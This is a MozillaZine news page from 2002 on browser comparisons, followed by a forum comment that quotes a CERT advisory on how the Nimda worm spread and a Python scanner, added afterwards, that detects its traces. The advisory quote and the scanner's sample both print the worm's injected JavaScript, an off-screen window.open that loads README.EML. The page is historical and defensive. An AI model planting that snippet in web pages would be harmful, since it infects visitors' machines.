MozillaZine

Comparatively Speaking...

Monday July 1st, 2002

Linux Online recently compared the major Linux browsers, including the Mozilla-based trio of Mozilla 1.0, Netscape 6.2 and Galeon. Reviewer Michael J Jordan praises Mozilla's stability, tabbed browsing, rendering and customisation.

As mentioned by fondacio on our forums, the International Herald and Tribune took a look at Mozilla, Opera and NeoPlanet (note that the site doesn't seem to work in some builds of Mozilla). Reviewer Lee Dembart says that "Mozilla is impressive and has it all over Opera." He especially likes the ability to block pop-ups, tabbed browsing and pipelining.

UPDATE! tuxracer writes: "I've put up a browser comparison list, comparing various features that affect usability and W3C standards compliance. It compares Mozilla 1.0, Netcaptor 7.01, Internet Explorer 6.0 (Windows), and Internet Explorer 5.x (Mac)."


#84 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Sunday July 7th, 2002 10:55 PM


How then did your system get infected? Did you or anyone you know get NIMDA? Here's how NIMDA worked:

1. from client to client via email
2. from client to client via open network shares
3. from web server to client via browsing of compromised web sites
4. from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities (VU#111677 and CA-2001-12)
5. from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms

<http://www.cert.org/body/…es/CA200126_FA200126.html>

"... Note that any x86 email software that uses a vulnerable version of Internet Explorer to display HTML messages [1] will automatically execute the malicious attachment if the message is merely opened or previewed [4]. This happens because the worm MIME encodes the attachment to take advantage of a known vulnerability called "Automatic Execution of Embedded MIME Types" (see CERT advisory CA-2001-06 [1]). Microsoft's Outlook and Outlook Express are the most typical victims. Every ten days the worm regenerates its list of email addresses and sends itself to all....

If a vulnerable version of Internet Explorer is used to view or preview the message, the malicious attachment will be executed without the user's knowledge. Unpatched IE 5.01 and IE 5.5 without SP2 are vulnerable. Further, IE 6 can be vulnerable under specific conditions. See the PROTECT section for further information. Mail clients that are not using vulnerable versions of IE can also facilitate infection, but in those cases the user must double-click the attachment to execute the virus....

Once Nimda has infected a system, it searches the local hard drives for .HTML, .ASP, and .HTM files [3]. The worm also looks for files with INDEX, MAIN, or DEFAULT in the name [4]. If any such files are found, the worm creates a multi-part MIME-encoded copy of itself named README.EML in the same directory. Further, the worm adds a small piece of JavaScript to each one of the found files. The JavaScript, shown below, contains instructions to open a new browser window and download README.EML to the client. As described in the section regarding email propagation, if the client happens to be a vulnerable IE browser, the malicious program will be automatically executed and the machine viewing the web page will become infected.

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

The author of Nimda cleverly chose to write the JavaScript such that the new browser window will be opened outside the viewable desktop area so that the user may not even notice it. Browsers other than IE may force the window into the viewable area, and will not automatically execute README.EML."

<http://216.239.35.100/sea…es&hl=en&ie=UTF-8>

NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day <http://zdnet.com.com/2100-1105-273420.html-> that sounds considerably more widespread than the 42 thousand fatality car wrecks in all of that year), didn't require any user execution. If you got it you probably got it by simply opening an email message or browsing a web page. That Microsoft offered patches to IE/Outlook to defend against this massive attack is an admission of inadequate security in their vulnerable applications. I didn't get infected by NIMDA while a good portion of my friends and family did. I attribute that to not using applications with inadequate security. Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't. All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application.

--Asa
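
A defender's check for the web-server traces the quoted advisory describes, added here as an example and not part of the original comment or of any CERT tooling: it walks a web root for .html/.htm/.asp pages that call window.open on an .eml file, and reports whether the window is placed off-screen and whether the named .eml file sits beside the page. The function names, the 3000-pixel threshold and the sample page are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

WEB_EXTS = {".html", ".htm", ".asp"}  # file types named in the quoted advisory
# window.open(...) whose first argument is an .eml file, as in the quoted snippet
OPEN_EML = re.compile(r"""window\.open\(\s*["']([^"']+\.eml)["']([^)]*)\)""", re.I)
COORD = re.compile(r"\b(top|left)\s*=\s*(\d+)", re.I)
OFFSCREEN = 3000  # assumed threshold for "outside the viewable desktop area"
# Constructed sample: an ordinary page with the quoted snippet appended to it
SAMPLE = ('<html><body>hello</body></html>\n<html><script language="JavaScript">'
          'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
          '</script></html>')


def scan_file(path):
    """Return a finding for one web file, or None if no .eml pop-up is present."""
    m = OPEN_EML.search(path.read_text(errors="replace"))
    if not m:
        return None
    coords = [int(v) for _, v in COORD.findall(m.group(2))]
    wanted = Path(m.group(1)).name.lower()
    # Case-insensitive look for the dropped copy in the page's own directory
    dropped = any(p.name.lower() == wanted for p in path.parent.iterdir())
    return {"file": str(path), "target": m.group(1),
            "offscreen": any(v >= OFFSCREEN for v in coords), "eml_present": dropped}


def scan_tree(root):
    """Walk a web root and collect a finding for every page that matches."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hit = scan_file(path)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed web root
        Path(d, "index.html").write_text(SAMPLE)
        Path(d, "README.EML").write_text("placeholder, not a real message")
        for finding in scan_tree(d):
            print(finding)
```

A page that matches with both `offscreen` and `eml_present` set is the strongest signal; a match with neither is more likely a legitimate pop-up that happens to link to a saved message.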